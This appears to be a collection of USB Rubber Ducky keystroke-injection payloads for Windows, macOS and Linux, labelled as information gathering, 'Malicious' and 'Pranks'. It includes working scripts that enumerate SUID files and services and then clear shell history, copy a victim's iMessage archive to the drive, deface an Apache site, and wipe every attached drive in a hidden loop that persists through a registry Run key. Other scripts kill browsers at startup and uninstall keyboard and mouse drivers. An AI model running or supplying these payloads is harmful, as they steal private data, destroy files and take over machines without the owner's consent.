ENTER
DELAY 50
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Development tools availability: " >> info_gathering.txt
ENTER
DELAY 50
STRING which gcc >> info_gathering.txt
ENTER
DELAY 50
STRING which g++ >> info_gathering.txt
ENTER
DELAY 50
STRING which python >> info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Print TCP/UDP Listening Services: " >> info_gathering.txt
ENTER
DELAY 50
STRING netstat -tunlpe >> info_gathering.txt
ENTER
DELAY 300
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Installed Packages: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 200
STRING dpkg -l >> info_gathering.txt
ENTER
DELAY 300
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Find Readable Folders in /etc: " >> info_gathering.txt
ENTER
DELAY 50
STRING find /etc -user $(id -u) -perm -u=r -o -group $(id -g) -perm -g=r -o -perm -o=r -ls 2> /dev/null >> info_gathering.txt
ENTER
DELAY 500
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Find SUID and GUID files" >> info_gathering.txt
ENTER
DELAY 50
STRING find / -type f -perm -u=s -o -type f -perm -g=s -ls  2> /dev/null >> info_gathering.txt
DELAY 50
ENTER
DELAY 15000
STRING history -c
DELAY 50
ENTER
DELAY 50
STRING exit
DELAY 50
ENTER

Internet Protocol Slurp (OSX)

This payload quickly copies down information gathered from terminal’s command ifconfig and pastes it in a file called “default_config” (So there is no suspicion) in the Documents folder. This payload also quickly cleans up after itself allowing for a 10 second stealth slurp. If need be you may change the command “ifconfig” to any other command such as “ls” or others.

DELAY 1000
GUI SPACE
DELAY 100
STRING terminal
DELAY 100
ENTER
DELAY 1000
STRING ifconfig
ENTER
DELAY 250
GUI A
DELAY 100
GUI C
DELAY 100
GUI Q
DELAY 100
GUI SPACE
DELAY 100
STRING textedit
DELAY 100
ENTER
DELAY 1000
GUI A
DELAY 100
GUI V
DELAY 100
GUI Q
DELAY 500
STRING default_config
ENTER

iMessage Capture (OSX)

REM This script captures iMessages and puts it into
REM a folder named automatically to the victims username
DELAY 500
GUI SPACE
DELAY 150
STRING Terminal
ENTER
DELAY 300
STRING cp -r ~/Library/Messages/Archive /Volumes/RubberDucky/$USER/
ENTER
STRING history -c
ENTER
STRING diskutil umount /Volumes/RubberDucky
ENTER
DELAY 500
STRING history -c
ENTER
STRING echo 5A13X99
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 250
GUI q

Malicious

Auto defacer (Apache)

Saves old index file as index.bak, then writes a new one detailing the extensiveness of the hack that has been performed against them.

NOTE: Originally this script had a DEFAULT_DELAY value of 200. Since this value did not fit into a Java byte (Java bytes are signed) it had no effect on the final script. It has been removed.

REM Auto Defacer for Ubuntu Based Machines running Apache.
REM Description: Automatically defaces index page of an apache web server.
DEFAULT_DELAY 200
ALT F2
STRING terminal
ENTER
STRING cd /var/www
ENTER
STRING mv index.* index.bak
ENTER
STRING touch index.html
ENTER
STRING nano index.html
ENTER
STRING <marquee>You have been hacked by the USB Rubber Ducky!</marquee>
ENTER
STRING <center><a href="http://www.usbrubberducky.com/"><img src="http://cdn.shopify.com/s/files/1/0068/2142/products/usbducky2.jpg" /></a><center>
ENTER
STRING <center><h5>Your old index page can be found <a href="./index.bak">here.</a></h5></center>
CONTROL x
STRING y
ENTER
STRING exit
ENTER

Batch wiper drive eraser (Windows)

This script will erase attached drives on your computer. Made to demonstrate batch wiper malware. Features a registry key that will restart the script on reboot, as well as a VB script that will allow the batch file to run silently on Vista and Windows 7 machines.

REM PURPOSE: to delete the contents of attached drives.
GUI r
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM THE DIRECTORY YOU WANT TO HIDE THE SCRIPT IN
STRING cd %TEMP%
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM Delete batch file if already exists
STRING erase /Q SecurityBullseye.bat
ENTER
REM Make the batch file
REM SLIGHT THROWBACK TO VIDEO GAME BIOSHOCK I/II
STRING copy con SecurityBullseye.bat
ENTER
REM REGISTRY KEY RESTARTS THE SCRIPT ON REBOOT
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\SecurityBullseye.bat" /f
ENTER
STRING :while1
ENTER
REM C:\ IS USUALLY THE DRIVE THE OS IS INSTALLED ON, SO OMIT.
STRING for %%a in (A B D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
ENTER
STRING IF EXIST %%a:\ erase /Q /S /F "%%a:\*.*"
ENTER
STRING IF EXIST %%a:\ rmdir /Q /S "%%a:\*"
ENTER
STRING )
ENTER
STRING timeout /t 60
ENTER
STRING goto :while1
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs SecurityBullseye.bat
ENTER
STRING EXIT
ENTER

Deny net access (Windows)

Still needs some work to get it to start up silently on restart.

REM A new DenyNetAccess program that employs window hiding techniques.
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM A different directory in case the second one is inaccessible
DELAY 750
STRING cd %userprofile%\Downloads\
ENTER
STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER
REM Delete batch file if already exists
STRING erase /Q a.bat
ENTER
REM Make the batch file
STRING copy con a.bat
ENTER
STRING @echo off
ENTER
STRING :Start
ENTER
REM Release networking information
STRING ipconfig /release
ENTER
REM 2 Generic Browsers
STRING taskkill /f /im "iexplore.exe"
ENTER
STRING taskkill /f /im "firefox.exe"
ENTER
REM Microsoft Visual Studio 2010
STRING taskkill /f /im "devenv.exe"
ENTER
STRING timeout /t 60
ENTER
STRING Goto Start
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs a.bat
ENTER
REM Close the cmd prompt.
STRING EXIT
ENTER

Website Lock (Windows)

REM Title: Website Lock
REM Author: Audiack
REM Target Ducky Encoder: 2.6.2
REM Target OS: Windows 7 (32 and 64 bit), maybe older/newer windows versions. Haven't tested it on any other than 7.
REM Description: Plays off of Aprizm's script to open a website, but it also disables the mouse and keyboard so the user can't leave the website.
REM Info:
REM     The user can easily unplug and re-plug in the keyboard/mouse to reinstall the drivers get them working again.
REM     This requires the user to plug a USB drive in BEFORE the ducky is plugged in.
REM     The files are here: https://www.dropbox.com/sh/i09leu4kcifta6a/AACEFYQnlOIUsDtLLrQuemCha?dl=0.
REM     Make sure the files are in the root of a drive called DUCKY.
REM     Twin duck works well with this. It is what I used when I was testing it.
REM File Descriptions:
REM     The devcon32 & devcon64 are the files used to uninstall the keyboard and mouse drivers (for the two architectures).
REM     The invisible.vbs is used to run the batch script invisibly after the video is in fullscreen.
REM     The TheRealAnnoyance.bat is the batch script run in the background that disables their mouse & keyboard.
REM     The WebsiteLink.txt contains the website link. The user can change this as desired. Make sure there are no spaces and there is only a single link.
REM     If you are going to modify the website link as a youtube video, it needs to be in this format: https://www.youtube.com/embed/sCNrK-n68CM?rel=0&autoplay=1&loop=1
REM     Find the youtube video you want, then take the part after watch?v= and put it in place of sCNrK-n68CM in the above link.
DELAY 3000
CTRL ESC
DELAY 700
STRING cmd
CTRL-SHIFT ENTER
DELAY 3000
ALT Y
DELAY 700

STRING for /f %d in ('wmic.exe volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
ENTER
DELAY 1200
STRING cd /d %myd%
ENTER

DELAY 1000
STRING type "WebsiteLink.txt" | clip
ENTER
DELAY 100
STRING C:/windows/System32/wscript.exe invisible.vbs TheRealAnnoyance.bat
ENTER
DELAY 400
REM Aprizm's code for youtube roller begins here. I changed the link to a ctrl-v so that the ducky pastes the contents of WebsiteLink.txt hence the above line of code: 'type "WebsiteLink.txt" | clip'
REM Title: Youtube Roller
REM Author: Aprizm
REM Description: This script opens a youtube video in fullscreen and puts the browser in fullscreen
REM Option : if you change the link of the video don't forget to change the watch with watch_popup to have it fullscreen; also add &loop=1 at the end to make it loop forever
DELAY 200
GUI r
DELAY 200
CTRL V
ENTER
DELAY 1000
F11

Pranks

Ugly rolled (Windows)

REM payload creates a vbs script that is run to make a YouveBeenUglyRolled.lnk to IE in the user's start-up folder
REM IE is set to run in kiosk mode "-K" and links to youtube with a very annoying lady gaga with jim carrey's face video
REM note if running in 64 bit windows, you may need to change %programfiles% with %programfiles(x86)% flash player 64 bit may not be installed!
ESCAPE
GUI r
DELAY 120
STRING cmd.exe
ENTER
DELAY 325
STRING copy con YouveBeenUglyRolled.vbs
ENTER
STRING Set WshShell = WScript.CreateObject("WScript.Shell"):
STRING StrMyStartUp = WshShell.SpecialFolders("Startup"):
STRING Set lnk = WshShell.CreateShortcut(StrMyStartUp + "\YouveBeenUglyRolled.lnk"):
ENTER
STRING lnk.TargetPath = "%programfiles%\Internet Explorer\iexplore.exe":
REM place any link here, this one is a very annoying lady gaga with jim carrey's face
REM the -K option makes IE run in kiosk mode
STRING lnk.Arguments = "-K http://www.youtube.com/v/XYYo3T6nCw8?autoplay=1":
REM also try http://www.youtube.com/v/9WZGyzz5O-U?autoplay=1 for katy perry rip, or
REM http://www.youtube.com/v/HqGsT6VM8Vg?autoplay=1 for scary car video
STRING lnk.Save
ENTER
CTRL z
ENTER
STRING YouveBeenUglyRolled.vbs
ENTER
DELAY 200
STRING DEL YouveBeenUglyRolled.vbs
ENTER
STRING EXIT
ENTER

Wallpaper (Windows7)

Minimizes all windows to desktop, takes screenshot, disables desktop icons, saves screenshot in %userprofile% and sets as wallpaper

GUI d
DELAY 500
PRINTSCREEN
DELAY 100
MENU
DELAY 300
STRING V
DELAY 40
STRING D
DELAY 300
GUI r
DELAY 700
STRING mspaint
ENTER
DELAY 1200
CTRL v
DELAY 500
CTRL s
DELAY 1000
STRING %userprofile%\a.bmp
ENTER
DELAY 500
ALT f
DELAY 400
STRING K
DELAY 100
STRING F
DELAY 1000
ALT F4
DELAY 300
GUI d

Same thing but better?

DELAY 10000
GUI d
DELAY 100
PRINTSCREEN
DELAY 100
MENU
DELAY 70
STRING h
DELAY 50
STRING b
DELAY 50
GUI r
DELAY 200
STRING mspaint
ENTER
DELAY 500
CTRL v
DELAY 300
ALT f
DELAY 300
STRING b
DELAY 300
ENTER
DELAY 300
STRING a1z2.png
ENTER
ALT F4
DELAY 300
GUI d

Paint Hack (Windows)

CONTROL ESCAPE
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL e
STRING 6
TAB
STRING 1
ENTER
CTRL PAGEUP
REPEAT 5
REM ****FIRST COLOR****
ALT h
STRING EC
ALT r
STRING 10
TAB
STRING 0
TAB
STRING 0
ENTER
REM ****SECOND COLOR****
ALT h
STRING EC
ALT r
STRING 13
TAB
STRING 10
TAB
STRING 13
ENTER
REM ****THIRD COLOR****
ALT h
STRING EC
ALT r
STRING 100
TAB
STRING 109
TAB
STRING 99
ENTER
REM ****FOURTH COLOR****
ALT h
STRING EC
ALT r
STRING 120
TAB
STRING 101
TAB
STRING 46
ENTER
REM ****FIFTH COLOR****
ALT h
STRING EC
ALT r
STRING 0
TAB
STRING 0
TAB
STRING 101
ENTER
REM ****SIXTH COLOR****
ALT h
STRING EC
ALT r
STRING 0
TAB
STRING 0
TAB
STRING 0
ENTER

You got quacked! (Windows)

Changes the user's desktop background to a Rubber Duck saying “YOU GOT QUACKED!” with a Hak5 logo.

GUI d
WINDOWS
STRING https://i.imgflip.com/1dv8ac.jpg
ENTER
DELAY 100
REM Opens up window and goes to a image I created xD
CTRL s
STRING %userprofile%\Desktop\QUACKED
ENTER
REM saving the picture to the user Desktop, pic name QUACKED...
DELAY 100
GUI d
REM shows desktop
WINDOWS r
STRING %userprofile%\Desktop\QUACKED.png
ENTER
REM opens the png file
MENU
ENTER
ALT F4
REM sets the background, and closes.
GUI d
MENU
STRING v
STRING d

Restart (Windows)

REM Open the command line. You don't need admin because you are only adding to the Users Startup Directory
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
ENTER
DELAY 100
REM start making Shutdown.bat
STRING copy con "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shutdown.bat"
STRING @echo off
ENTER
STRING shutdown /r /t 30
REM The shutdown command has many good options '/t' adds a Delay, and '/r' restarts
REM '/s' will shut the computer down and '/l' (L) is to just logoff the user more options are available by running 'shutdown /?'
ENTER
CTRL z
STRING exit
ENTER

Screen rotate (Windows)

CONTROL ESCAPE
DELAY 50
STRING Screen Resolution
DELAY 50
ENTER
DELAY 100
TAB
TAB
TAB
DOWN
DOWN
TAB
TAB
TAB
TAB
TAB
ENTER
TAB
ENTER

Log off (Windows)

DELAY 500
GUI
DELAY 150
TAB
DELAY 150
TAB
DELAY 150
ENTER

Youtube blaster (OSX)

REM This payload will open terminal, crank up the Macs volume all the way, then open a youtube video of
REM your choice by replacing the link.
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 4000
STRING osascript -e 'set volume 7'
DELAY 500
ENTER
DELAY 500
STRING open https://www.youtube.com/watch?v=dQw4w9WgXcQ
DELAY 500
ENTER

Photo Booth (OSX)

REM Description: This payload opens a photo booth window and automatically takes a picture. Once this picture is taken, this payload proceeds to open terminal and tell it to say "You look ugly!". This payload is great for friends and family.
REM --------------------------------
DELAY 1000
GUI SPACE
DELAY 100
STRING photo booth
DELAY 100
ENTER
DELAY 1000
ENTER
DELAY 3000
GUI SPACE
DELAY 100
STRING terminal
DELAY 100
ENTER
DELAY 1000
STRING say You look ugly!
DELAY 100
ENTER